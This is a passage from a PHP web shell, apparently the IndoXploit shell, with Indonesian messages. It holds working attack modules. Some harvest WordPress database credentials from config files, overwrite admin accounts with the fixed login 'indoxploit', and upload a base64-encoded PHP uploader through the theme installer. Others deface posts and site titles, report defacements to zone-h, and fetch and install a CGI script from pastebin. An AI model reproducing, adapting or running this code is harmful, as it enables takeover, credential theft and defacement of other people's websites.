\'","\'");\r\n\t\t\t\t$dbprefix = ambilkata($config,"table_prefix  = \'","\'");\r\n\t\t\t\t$prefix = $dbprefix."posts";\r\n\t\t\t\t$option = $dbprefix."options";\r\n\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");\r\n\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t$id = $result[ID];\r\n\t\t\t\t$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");\r\n\t\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t\t$target = $result2[option_value];\r\n\t\t\t\t$update = mysql_query("UPDATE $prefix SET post_title=\'$title\',post_content=\'$script\',post_name=\'$pn_title\',post_status=\'publish\',comment_status=\'open\',ping_status=\'open\',post_type=\'post\',comment_count=\'1\' WHERE id=\'$id\'");\r\n\t\t\t\t$update .= mysql_query("UPDATE $option SET option_value=\'$title\' WHERE option_name=\'blogname\' OR option_name=\'blogdescription\'");\r\n\t\t\t\techo "<div style=\'margin: 5px auto;\'>";\r\n\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\techo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";\r\n\t\t\t\t} else {\r\n\t\t\t\t\techo "URL: <a href=\'$target/?p=$id\' target=\'_blank\'>$target/?p=$id</a> -> ";\r\n\t\t\t\t}\r\n\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\techo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";\r\n\t\t\t\t} else {\r\n\t\t\t\t\techo "<font color=lime>sukses di ganti.</font><br>";\r\n\t\t\t\t}\r\n\t\t\t\techo "</div>";\r\n\t\t\t\tmysql_close($conn);\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "<center>\r\n\t\t<h1>Auto Edit Title+Content WordPress</h1>\r\n\t\t<form method=\'post\'>\r\n\t\tDIR Config: <br>\r\n\t\t<input type=\'text\' size=\'50\' name=\'config_dir\' value=\'$dir\'><br><br>\r\n\t\tSet Title: <br>\r\n\t\t<input type=\'text\' name=\'new_title\' value=\'Hacked by \' placeholder=\'New Title\'><br><br>\r\n\t\tEdit Content?: <input type=\'radio\' name=\'cek_edit\' value=\'Y\' checked>Y<input type=\'radio\' name=\'cek_edit\' value=\'N\'>N<br>\r\n\t\t<span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>\r\n\t\t<textarea name=\'edit_content\' placeholder=\'contoh script: http://pastebin.com/EpP671gK\' style=\'width: 450px; height: 150px;\'></textarea><br>\r\n\t\t<input type=\'submit\' name=\'hajar\' value=\'Submit\' style=\'width: 100px;\'><br>\r\n\t\t</form>\r\n\t\t<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>\r\n\t\t";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'zoneh\') {\r\n\tif($_POST[\'submit\']) {\r\n\t\t$domain = explode("\\r\\n", $_POST[\'url\']);\r\n\t\t$nick =  $_POST[\'nick\'];\r\n\t\techo "Defacer Onhold: <a href=\'http://www.zone-h.org/archive/notifier=$nick/published=0\' target=\'_blank\'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";\r\n\t\techo "Defacer Archive: <a href=\'http://www.zone-h.org/archive/notifier=$nick\' target=\'_blank\'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";\r\n\t\tfunction zoneh($url,$nick) {\r\n\t\t\t$ch = curl_init("http://www.zone-h.com/notify/single");\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_POST, true);\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");\r\n\t\t\treturn curl_exec($ch);\r\n\t\t\t\t  curl_close($ch);\r\n\t\t}\r\n\t\tforeach($domain as $url) {\r\n\t\t\t$zoneh = zoneh($url,$nick);\r\n\t\t\tif(preg_match("/color=\\"red\\">OK<\\/font><\\/li>/i", $zoneh)) {\r\n\t\t\t\techo "$url -> <font color=lime>OK</font><br>";\r\n\t\t\t} else {\r\n\t\t\t\techo "$url -> <font color=red>ERROR</font><br>";\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "<center><form method=\'post\'>\r\n\t\t<u>Defacer</u>: <br>\r\n\t\t<input type=\'text\' name=\'nick\' size=\'58\' value=\'./MekiTembem404\'><br>\r\n\t\t<u>Domains</u>: <br>\r\n\t\t<textarea style=\'width: 450px; height: 150px;\' name=\'url\'></textarea><br>\r\n\t\t<input type=\'submit\' name=\'submit\' value=\'Submit\' style=\'width: 100px;\'>\r\n\t\t</form>";\r\n\t}\r\n\techo "</center>";\r\n} elseif($_GET[\'do\'] == \'cgi\') {\r\n\t$cgi_dir = mkdir(\'idx_cgi\', 0755);\r\n\t$file_cgi = "idx_cgi/cgi.izo";\r\n\t$isi_htcgi = "AddHandler cgi-script .izo";\r\n\t$htcgi = fopen(".htaccess", "w");\r\n\t$cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");\r\n\t$cgi = fopen($file_cgi, "w");\r\n\tfwrite($cgi, $cgi_script);\r\n\tfwrite($htcgi, $isi_htcgi);\r\n\tchmod($file_cgi, 0755);\r\n\techo "<iframe src=\'idx_cgi/cgi.izo\' width=\'100%\' height=\'270%\' frameborder=\'0\' scrolling=\'yes\'></iframe>";\r\n} elseif($_GET[\'do\'] == \'fake_root\') {\r\n\tob_start();\r\n\tfunction reverse($url) {\r\n\t\t$ch = curl_init("http://domains.yougetsignal.com/domains.php");\r\n\t\t\t  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );\r\n\t\t\t  curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");\r\n\t\t\t  curl_setopt($ch, CURLOPT_HEADER, 0);\r\n\t\t\t  curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t$resp = curl_exec($ch);\r\n\t\t$resp = str_replace("[","", str_replace("]","", str_replace("\\"\\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("\'","", str_replace("\'","", str_replace(":",",", str_replace(\'"\',\'\', $resp ) ) ) ) ) ) ) ) ) ))));\r\n\t\t$array = explode(",,", $resp);\r\n\t\tunset($array[0]);\r\n\t\tforeach($array as $lnk) {\r\n\t\t\t$lnk = "http://$lnk";\r\n\t\t\t$lnk = str_replace(",", "", $lnk);\r\n\t\t\techo $lnk."\\n";\r\n\t\t\tob_flush();\r\n\t\t\tflush();\r\n\t\t}\r\n\t\t\t  curl_close($ch);\r\n\t}\r\n\tfunction cek($url) {\r\n\t\t$ch = curl_init($url);\r\n\t\t\t  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );\r\n\t\t\t  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\r\n\t\t$resp = curl_exec($ch);\r\n\t\treturn $resp;\r\n\t}\r\n\t$cwd = getcwd();\r\n\t$ambil_user = explode("/", $cwd);\r\n\t$user = $ambil_user[2];\r\n\tif($_POST[\'reverse\']) {\r\n\t\t$site = explode("\\r\\n", $_POST[\'url\']);\r\n\t\t$file = $_POST[\'file\'];\r\n\t\tforeach($site as $url) {\r\n\t\t\t$cek = cek("$url/~$user/$file");\r\n\t\t\tif(preg_match("/hacked/i", $cek)) {\r\n\t\t\t\techo "URL: <a href=\'$url/~$user/$file\' target=\'_blank\'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "<center><form method=\'post\'>\r\n\t\tFilename: <br><input type=\'text\' name=\'file\' value=\'deface.html\' size=\'50\' height=\'10\'><br>\r\n\t\tUser: <br><input type=\'text\' value=\'$user\' size=\'50\' height=\'10\' readonly><br>\r\n\t\tDomain: <br>\r\n\t\t<textarea style=\'width: 450px; height: 250px;\' name=\'url\'>";\r\n\t\treverse($_SERVER[\'HTTP_HOST\']);\r\n\t\techo "</textarea><br>\r\n\t\t<input type=\'submit\' name=\'reverse\' value=\'Scan\' style=\'width: 100px;\'>\r\n\t\t</form><br>\r\n\t\tNB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'adminer\') {\r\n\t$full = str_replace($_SERVER[\'DOCUMENT_ROOT\'], "", $dir);\r\n\tfunction adminer($url, $isi) {\r\n\t\t$fp = fopen($isi, "w");\r\n\t\t$ch = curl_init();\r\n\t\t \t  curl_setopt($ch, CURLOPT_URL, $url);\r\n\t\t \t  curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);\r\n\t\t \t  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\t \t  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\r\n\t\t   \t  curl_setopt($ch, CURLOPT_FILE, $fp);\r\n\t\treturn curl_exec($ch);\r\n\t\t   \t  curl_close($ch);\r\n\t\tfclose($fp);\r\n\t\tob_flush();\r\n\t\tflush();\r\n\t}\r\n\tif(file_exists(\'adminer.php\')) {\r\n\t\techo "<center><font color=lime><a href=\'$full/adminer.php\' target=\'_blank\'>-> adminer login <-</a></font></center>";\r\n\t} else {\r\n\t\tif(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {\r\n\t\t\techo "<center><font color=lime><a href=\'$full/adminer.php\' target=\'_blank\'>-> adminer login <-</a></font></center>";\r\n\t\t} else {\r\n\t\t\techo "<center><font color=red>gagal buat file adminer</font></center>";\r\n\t\t}\r\n\t}\r\n} elseif($_GET[\'do\'] == \'auto_dwp\') {\r\n\tif($_POST[\'auto_deface_wp\']) {\r\n\t\tfunction anucurl($sites) {\r\n    \t\t$ch = curl_init($sites);\r\n\t       \t\t  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t       \t\t  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t       \t\t  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");\r\n\t       \t\t  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);\r\n\t       \t\t  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t       \t\t  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t       \t\t  curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t       \t\t  curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t       \t\t  curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t$data = curl_exec($ch);\r\n\t\t\t\t  curl_close($ch);\r\n\t\t\treturn $data;\r\n\t\t}\r\n\t\tfunction lohgin($cek, $web, $userr, $pass, $wp_submit) {\r\n    \t\t$post = array(\r\n                   "log" => "$userr",\r\n                   "pwd" => "$pass",\r\n                   "rememberme" => "forever",\r\n                   "wp-submit" => "$wp_submit",\r\n                   "redirect_to" => "$web",\r\n                   "testcookie" => "1",\r\n                   );\r\n\t\t\t$ch = curl_init($cek);\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t$data = curl_exec($ch);\r\n\t\t\t\t  curl_close($ch);\r\n\t\t\treturn $data;\r\n\t\t}\r\n\t\t$scan = $_POST[\'link_config\'];\r\n\t\t$link_config = scandir($scan);\r\n\t\t$script = htmlspecialchars($_POST[\'script\']);\r\n\t\t$user = "indoxploit";\r\n\t\t$pass = "indoxploit";\r\n\t\t$passx = md5($pass);\r\n\t\tforeach($link_config as $dir_config) {\r\n\t\t\tif(!is_file("$scan/$dir_config")) continue;\r\n\t\t\t$config = file_get_contents("$scan/$dir_config");\r\n\t\t\tif(preg_match("/WordPress/", $config)) {\r\n\t\t\t\t$dbhost = ambilkata($config,"DB_HOST\', \'","\'");\r\n\t\t\t\t$dbuser = ambilkata($config,"DB_USER\', \'","\'");\r\n\t\t\t\t$dbpass = ambilkata($config,"DB_PASSWORD\', \'","\'");\r\n\t\t\t\t$dbname = ambilkata($config,"DB_NAME\', \'","\'");\r\n\t\t\t\t$dbprefix = ambilkata($config,"table_prefix  = \'","\'");\r\n\t\t\t\t$prefix = $dbprefix."users";\r\n\t\t\t\t$option = $dbprefix."options";\r\n\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");\r\n\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t$id = $result[ID];\r\n\t\t\t\t$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");\r\n\t\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t\t$target = $result2[option_value];\r\n\t\t\t\tif($target == \'\') {\t\t\t\t\t\r\n\t\t\t\t\techo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";\r\n\t\t\t\t} else {\r\n\t\t\t\t\techo "[+] $target <br>";\r\n\t\t\t\t}\r\n\t\t\t\t$update = mysql_query("UPDATE $prefix SET user_login=\'$user\',user_pass=\'$passx\' WHERE ID=\'$id\'");\r\n\t\t\t\tif(!$conn OR !$db OR !$update) {\r\n\t\t\t\t\techo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} else {\r\n\t\t\t\t\t$site = "$target/wp-login.php";\r\n\t\t\t\t\t$site2 = "$target/wp-admin/theme-install.php?upload";\r\n\t\t\t\t\t$b1 = anucurl($site2);\r\n\t\t\t\t\t$wp_sub = ambilkata($b1, "id=\\"wp-submit\\" class=\\"button button-primary button-large\\" value=\\"","\\" />");\r\n\t\t\t\t\t$b = lohgin($site, $site2, $user, $pass, $wp_sub);\r\n\t\t\t\t\t$anu2 = ambilkata($b,"name=\\"_wpnonce\\" value=\\"","\\" />");\r\n\t\t\t\t\t$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");\r\n\t\t\t\t\t$www = "m.php";\r\n\t\t\t\t\t$fp5 = fopen($www,"w");\r\n\t\t\t\t\tfputs($fp5,$upload3);\r\n\t\t\t\t\t$post2 = array(\r\n\t\t\t\t\t\t\t"_wpnonce" => "$anu2",\r\n\t\t\t\t\t\t\t"_wp_http_referer" => "/wp-admin/theme-install.php?upload",\r\n\t\t\t\t\t\t\t"themezip" => "@$www",\r\n\t\t\t\t\t\t\t"install-theme-submit" => "Install Now",\r\n\t\t\t\t\t\t\t);\r\n\t\t\t\t\t$ch = curl_init("$target/wp-admin/update.php?action=upload-theme");\r\n\t\t\t\t\t\t  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t\t  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t\t\t  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t\t\t  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t\t\t  curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t\t\t\t\t  curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);\r\n\t\t\t\t\t\t  curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t\t\t\t\t\t  curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t\t\t\t\t      curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t\t\t$data3 = curl_exec($ch);\r\n\t\t\t\t\t\t  curl_close($ch);\r\n\t\t\t\t\t$y = date("Y");\r\n\t\t\t\t\t$m = date("m");\r\n\t\t\t\t\t$namafile = "id.php";\r\n\t\t\t\t\t$fpi = fopen($namafile,"w");\r\n\t\t\t\t\tfputs($fpi,$script);\r\n\t\t\t\t\t$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");\r\n\t\t\t\t\t\t   curl_setopt($ch6, CURLOPT_POST, true);\r\n\t\t\t\t\t\t   curl_setopt($ch6, CURLOPT_POSTFIELDS, array(\'file3\'=>"@$namafile"));\r\n\t\t\t\t\t\t   curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t\t   curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");\r\n\t       \t\t  \t\t   curl_setopt($ch6, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t       \t\t  \t\t   curl_setopt($ch6, CURLOPT_COOKIESESSION, true);\r\n\t\t\t\t\t$postResult = curl_exec($ch6);\r\n\t\t\t\t\t\t   curl_close($ch6);\r\n\t\t\t\t\t$as = "$target/k.php";\r\n\t\t\t\t\t$bs = anucurl($as);\r\n\t\t\t\t\tif(preg_match("#$script#is", $bs)) {\r\n            \t       \techo "[+] <font color=\'lime\'>Berhasil...</font><br>";\r\n            \t       \techo "[+] <a href=\'$as\' target=\'_blank\'>$as</a><br><br>"; \r\n            \t        } else {\r\n            \t        echo "[-] <font color=\'red\'>Gagal...</font><br>";\r\n            \t        echo "[!!] coba aja manual: <br>";\r\n            \t        echo "[+] <a href=\'$target/wp-login.php\' target=\'_blank\'>$target/wp-login.php</a><br>";\r\n            \t        echo "[+] username: <font color=lime>$user</font><br>";\r\n            \t        echo "[+] password: <font color=lime>$pass</font><br><br>";     \r\n            \t        }\r\n            \t\tmysql_close($conn);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "<center><h1>WordPress Auto Deface</h1>\r\n\t\t<form method=\'post\'>\r\n\t\t<input type=\'text\' name=\'link_config\' size=\'50\' height=\'10\' value=\'$dir\'><br>\r\n\t\t<input type=\'text\' name=\'script\' height=\'10\' size=\'50\' placeholder=\'Hacked by \' required><br>\r\n\t\t<input type=\'submit\' style=\'width: 100px;\' name=\'auto_deface_wp\' value=\'Submit\'>\r\n\t\t</form>\r\n\t\t<br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>\r\n\t\t</center>";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'auto_dwp2\') {\r\n\tif($_POST[\'auto_deface_wp\']) {\r\n\t\tfunction anucurl($sites) {\r\n    \t\t$ch = curl_init($sites);\r\n\t       \t\t  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t       \t\t  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t       \t\t  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");\r\n\t       \t\t  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);\r\n\t       \t\t  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t       \t\t  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t       \t\t  curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t       \t\t  curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t       \t\t  curl_setopt($ch, CURLOPT_COOKIESESSION,true);\r\n\t\t\t$data = curl_exec($ch);\r\n\t\t\t\t  curl_close($ch);\r\n\t\t\treturn $data;\r\n\t\t}\r\n\t\tfunction lohgin($cek, $web, $userr, $pass, $wp_submit) {\r\n    \t\t$post = array(\r\n                   "log" => "$userr",\r\n                   "pwd" => "$pass",\r\n                   "rememberme" => "forever",\r\n                   "wp-submit" => "$wp_submit",\r\n                   "redirect_to" => "$web",\r\n                   "testcookie" => "1",\r\n                   );\r\n\t\t\t$ch = curl_init($cek);\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t\t\t\t  curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t$data = curl_exec($ch);\r\n\t\t\t\t  curl_close($ch);\r\n\t\t\treturn $data;\r\n\t\t}\r\n\t\t$link = explode("\\r\\n", $_POST[\'link\']);\r\n\t\t$script = htmlspecialchars($_POST[\'script\']);\r\n\t\t$user = "indoxploit";\r\n\t\t$pass = "indoxploit";\r\n\t\t$passx = md5($pass);\r\n\t\tforeach($link as $dir_config) {\r\n\t\t\t$config = anucurl($dir_config);\r\n\t\t\t$dbhost = ambilkata($config,"DB_HOST\', \'","\'");\r\n\t\t\t$dbuser = ambilkata($config,"DB_USER\', \'","\'");\r\n\t\t\t$dbpass = ambilkata($config,"DB_PASSWORD\', \'","\'");\r\n\t\t\t$dbname = ambilkata($config,"DB_NAME\', \'","\'");\r\n\t\t\t$dbprefix = ambilkata($config,"table_prefix  = \'","\'");\r\n\t\t\t$prefix = $dbprefix."users";\r\n\t\t\t$option = $dbprefix."options";\r\n\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");\r\n\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t$id = $result[ID];\r\n\t\t\t$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");\r\n\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t$target = $result2[option_value];\r\n\t\t\tif($target == \'\') {\t\t\t\t\t\r\n\t\t\t\techo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";\r\n\t\t\t} else {\r\n\t\t\t\techo "[+] $target <br>";\r\n\t\t\t}\r\n\t\t\t$update = mysql_query("UPDATE $prefix SET user_login=\'$user\',user_pass=\'$passx\' WHERE ID=\'$id\'");\r\n\t\t\tif(!$conn OR !$db OR !$update) {\r\n\t\t\t\techo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";\r\n\t\t\t\tmysql_close($conn);\r\n\t\t\t} else {\r\n\t\t\t\t$site = "$target/wp-login.php";\r\n\t\t\t\t$site2 = "$target/wp-admin/theme-install.php?upload";\r\n\t\t\t\t$b1 = anucurl($site2);\r\n\t\t\t\t$wp_sub = ambilkata($b1, "id=\\"wp-submit\\" class=\\"button button-primary button-large\\" value=\\"","\\" />");\r\n\t\t\t\t$b = lohgin($site, $site2, $user, $pass, $wp_sub);\r\n\t\t\t\t$anu2 = ambilkata($b,"name=\\"_wpnonce\\" value=\\"","\\" />");\r\n\t\t\t\t$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");\r\n\t\t\t\t$www = "m.php";\r\n\t\t\t\t$fp5 = fopen($www,"w");\r\n\t\t\t\tfputs($fp5,$upload3);\r\n\t\t\t\t$post2 = array(\r\n\t\t\t\t\t\t"_wpnonce" => "$anu2",\r\n\t\t\t\t\t\t"_wp_http_referer" => "/wp-admin/theme-install.php?upload",\r\n\t\t\t\t\t\t"themezip" => "@$www",\r\n\t\t\t\t\t\t"install-theme-submit" => "Install Now",\r\n\t\t\t\t\t\t);\r\n\t\t\t\t$ch = curl_init("$target/wp-admin/update.php?action=upload-theme");\r\n\t\t\t\t\t  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t\t  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t\t  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t\t  curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t\t\t\t  curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);\r\n\t\t\t\t\t  curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t\t\t\t\t  curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t\t\t\t      curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t\t$data3 = curl_exec($ch);\r\n\t\t\t\t\t  curl_close($ch);\r\n\t\t\t\t$y = date("Y");\r\n\t\t\t\t$m = date("m");\r\n\t\t\t\t$namafile = "id.php";\r\n\t\t\t\t$fpi = fopen($namafile,"w");\r\n\t\t\t\tfputs($fpi,$script);\r\n\t\t\t\t$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");\r\n\t\t\t\t\t   curl_setopt($ch6, CURLOPT_POST, true);\r\n\t\t\t\t\t   curl_setopt($ch6, CURLOPT_POSTFIELDS, array(\'file3\'=>"@$namafile"));\r\n\t\t\t\t\t   curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t   curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");\r\n\t       \t\t  \t   curl_setopt($ch6, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t       \t\t \t   curl_setopt($ch6, CURLOPT_COOKIESESSION,true);\r\n\t\t\t\t$postResult = curl_exec($ch6);\r\n\t\t\t\t\t   curl_close($ch6);\r\n\t\t\t\t$as = "$target/k.php";\r\n\t\t\t\t$bs = anucurl($as);\r\n\t\t\t\tif(preg_match("#$script#is", $bs)) {\r\n                   \techo "[+] <font color=\'lime\'>Berhasil...</font><br>";\r\n                   \techo "[+] <a href=\'$as\' target=\'_blank\'>$as</a><br><br>"; \r\n                    } else {\r\n                    echo "[-] <font color=\'red\'>Gagal...</font><br>";\r\n                    echo "[!!] coba aja manual: <br>";\r\n                    echo "[+] <a href=\'$target/wp-login.php\' target=\'_blank\'>$target/wp-login.php</a><br>";\r\n                    echo "[+] username: <font color=lime>$user</font><br>";\r\n                    echo "[+] password: <font color=lime>$pass</font><br><br>";     \r\n                    }\r\n            \tmysql_close($conn);\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "<center><h1>WordPress Auto Deface V.2</h1>\r\n\t\t<form method=\'post\'>\r\n\t\tLink Config: <br>\r\n\t\t<textarea name=\'link\' placeholder=\'http://target.com/idx_config/user-config.txt\' style=\'width: 450px; height:250px;\'></textarea><br>\r\n\t\t<input type=\'text\' name=\'script\' height=\'10\' size=\'50\' placeholder=\'Hacked by \' required><br>\r\n\t\t<input type=\'submit\' style=\'width: 100px;\' name=\'auto_deface_wp\' value=\'Hajar!!\'>\r\n\t\t</form></center>";\r\n\t}\r\n}\r\necho \'</font></center></td></tr><tr><td><center>\';\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'<font color="green">File Upload</font><br />\';\r\n}else{\r\necho \'<font color="red">Upload Failed 